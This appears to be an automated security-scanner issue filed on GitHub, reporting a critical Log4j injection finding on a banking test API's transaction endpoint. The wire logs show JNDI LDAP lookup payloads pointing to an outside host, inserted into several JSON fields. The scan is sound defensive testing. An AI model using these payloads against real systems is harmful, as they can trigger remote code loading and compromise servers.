qaentadmin123 / RAWURLsPublic


log4j_injection on POST:/api/v1/primary-transaction #548

Open FidaUrRahman opened 2 years ago

FidaUrRahman commented 2 years ago

Title: log4j_injection Vulnerability on POST:/api/v1/primary-transaction
Project: Bismillah
Description:

Assertion: Log4j Injection is an attack in which the attacker is able to invoke a remote server by injecting a JNDI lookup string to perform a remote LDAP lookup via a vulnerable application.
Risk: log4j_injection
Severity: Critical
API Endpoint: http://netbanking.apisec.ai:8080/api/v1/primary-transaction
Environment: Master_github
Playbook: ApiV1PrimaryTransactionPostBodyParamLog4jInjection
Researcher: [apisec Bot]

QUICK TIPS

Suggestion:
Effort Estimate: null Hrs
Wire Logs:

07:21:22 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction]
07:21:22 [D] [AVPTPBPLInjection] : Method [POST]
07:21:22 [D] [AVPTPBPLInjection] : Authorization [Default]
07:21:22 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]]
07:21:22 [D] [AVPTPBPLInjection] : Request [{ "amount" : 7377, "availableBalance" : 1426867509, "createdBy" : "", "createdDate" : "", "description" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "type" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "${jndi:ldap://20.120.71.252:4389/0a34a242-4f54-46a0-a957-3c4d443dc577}", "version" : "" }, "version" : "" }]
07:21:22 [D] [AVPTPBPLInjection] : Status code [200]
07:21:22 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Y2M2MGM0YTctYjM4Ni00NDExLTg3OGItMzVlZGFjMDVhMzEw; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 26 May 2022 07:21:21 GMT"]]
07:21:22 [D] [AVPTPBPLInjection] : Response [{ "requestId" : "None", "requestTime" : "2022-05-26T07:21:22.257+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
07:21:22 [D] [AVPTPBPLInjection] : Response time [790]
07:21:22 [D] [AVPTPBPLInjection] : Response size [306]
07:21:22 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"0a34a242-4f54-46a0-a957-3c4d443dc577","ip":"10.240.0.20","timestamp":"2022-05-26T07:21:22.198375Z"} == null] result [Failed]

IMPORTANT LINKS

Vulnerability Details: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/dashboard/8a70803680faf14f0180ff3dd0124912/details

Project: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/allScans

Environment: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/environments/8a70803680faf14f0180ff39a86e480c/edit

Scan Dashboard: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/profiles/8a70803680faf14f0180ff39a883480e/runs/8a70803680faf14f0180ff3c15334811

Playbook: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/playbooks/ApiV1PrimaryTransactionPostBodyParamLog4jInjection

Coverage: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/categories

Code Sample: https://20.120.71.252/#/app/projects/8a70803680faf14f0180ff0340040534/dashboard/8a70803680faf14f0180ff3dd0124912/codesamples

PS: Please contact support@apisec.ai for apisec access and login issues.

--- apisec Bot ---